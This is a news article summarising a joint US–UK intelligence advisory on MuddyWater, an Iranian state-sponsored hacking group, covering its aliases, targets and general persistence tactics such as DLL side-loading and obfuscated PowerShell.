Iranian government-sponsored hackers are conducting active cyber operations against global commercial and government networks, according to a warning issued earlier this week by United States and United Kingdom intelligence agencies.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) said they detected a group of Iranian government-sponsored advanced persistent threat (APT) actors – known as MuddyWater –
conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across various sectors in Asia, Africa, Europe, and North America.
According to the notice, MuddyWater – also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros – is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), and has conducted broad cyber campaigns in support of MOIS objectives since about 2018.
“MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors,” the notice reads. “[They] are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware.”
The threat actors maintain persistence on these networks using tactics such as side loading dynamic link libraries to trick legitimate programs into running malware, and confusing PowerShell scripts to hide command and control functions. The FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware along with other tools as part of their malicious activity.
The notice provides organizations with observed tactics, techniques, and procedures; malware examples; and indicators of compromise associated with MuddyWater activity to help identify malicious activity against sensitive networks.